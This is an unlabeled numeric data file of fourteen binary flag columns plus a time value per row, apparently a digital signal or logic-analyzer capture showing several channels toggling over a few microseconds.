0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483828e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483852e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483876e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483900e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483924e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3483948e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3483976e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3484000e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484028e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3484052e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484076e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3484080e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3484100e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3484128e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3484180e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3484204e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484212e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3484228e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484252e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3484280e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484304e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3484328e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484356e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3484380e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484404e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3484412e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3484428e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3484456e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3484480e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3484508e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3484556e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3484580e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3484604e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3484628e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3484656e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3484680e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,2.3484684e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484688e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3484708e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484732e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3484756e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484780e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3484804e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484828e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3484856e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484880e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3484908e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484932e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3484956e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3484980e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3485004e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485028e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3485056e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485080e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3485084e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3485132e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3485156e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485164e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3485180e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485204e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3485228e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485256e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3485280e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485308e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3485332e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485356e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3485380e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485404e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3485428e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485456e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3485460e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3485480e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3485508e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3485528e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3485556e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3485580e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3485604e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3485628e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3485656e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3485680e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3485708e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3485756e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3485780e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485788e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3485804e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485828e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3485856e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485880e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3485908e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485928e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3485956e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3485980e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486004e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486028e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486056e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486080e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486104e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486128e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486156e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486180e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486204e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486228e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486252e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486280e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486304e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486328e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486356e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486380e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486404e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486428e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486452e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486480e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486504e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486528e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486556e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486580e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486604e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486628e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486652e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486680e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486704e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486728e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486756e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486780e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486804e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486828e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486852e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486876e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486904e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486928e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3486956e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3486980e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,1,2.3611508e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.3611740e-02 1,1,0,0,0,0,0,0,0,0,0,1,0,1,2.3611772e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.3611796e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.3612124e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.3612148e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.3612172e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.3612196e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.3612224e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.3612248e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,2.3612276e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,2.3612300e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3612340e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3612348e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3612372e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3612380e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3612396e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3612424e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,2.3612428e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3612432e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3612448e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3612476e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3612524e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3612548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3612556e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3612572e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3612596e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3612624e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3612648e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3612676e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3612700e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3612724e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3612748e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3612772e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3612796e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3612824e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3612848e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3612852e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3612900e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3612924e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3612932e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3612948e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3612972e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3612996e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613024e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613048e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613076e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613100e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613124e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3613128e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3613148e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3613172e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613180e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613196e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613224e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613248e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613276e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613300e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613324e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613348e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613372e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613396e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613424e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613476e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613500e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3613504e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3613524e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3613548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613556e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613572e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613596e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613624e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613648e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613676e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613700e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613724e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613748e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613772e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613796e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613824e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613848e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613876e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613900e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613924e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613948e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3613972e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3613996e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3614004e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3614052e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3614076e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,2.3614080e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614084e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614100e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614124e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614148e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614172e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614196e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614224e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3614228e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3614276e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3614300e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614308e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614324e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614348e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614372e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614396e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614424e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614448e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614500e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614524e-02 1,1,0,0,0,0,0,0,0,1,0,0,0,0,2.3614528e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3614532e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3614548e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3614572e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3614624e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3614648e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614656e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614676e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614700e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614724e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614748e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614772e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614796e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614824e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614848e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614876e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614900e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614924e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614948e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3614972e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3614996e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615024e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615048e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615076e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615100e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615124e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615148e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615172e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615196e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615224e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615248e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615276e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615300e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615324e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615348e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615372e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615396e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615424e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615448e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3615452e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3615500e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3615524e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615532e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615572e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615596e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615624e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615648e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615676e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615700e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615724e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615748e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615772e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615796e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615824e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615848e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615876e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615900e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615924e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3615948e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3615972e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3615980e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3616024e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3616048e-02 1,1,0,0,0,1,0,0,0,0,0,0,0,0,2.3616056e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616060e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616076e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616100e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616124e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616148e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616172e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616196e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616220e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616244e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616272e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616296e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616320e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3616348e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3616396e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3616420e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616428e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616444e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616472e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616496e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616520e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616572e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616596e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616620e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616644e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616668e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616696e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616720e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616748e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616772e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616796e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616820e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616844e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616868e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3616896e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3616920e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3616924e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3616972e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3616996e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617004e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617020e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617044e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617072e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617096e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617120e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617148e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617172e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617196e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617220e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617244e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617268e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617296e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617324e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617348e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617372e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617396e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617420e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617444e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617468e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617496e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617548e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617572e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3617576e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,2.3617596e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,2.3617620e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617628e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617644e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617668e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617696e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617720e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617748e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617772e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617796e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617820e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617844e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617868e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617896e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617924e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617948e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3617972e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3617996e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618024e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618048e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618076e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618100e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618124e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618148e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618172e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618196e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618224e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618248e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618276e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618300e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618324e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618348e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618372e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,2.3618396e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,2.3618424e-02 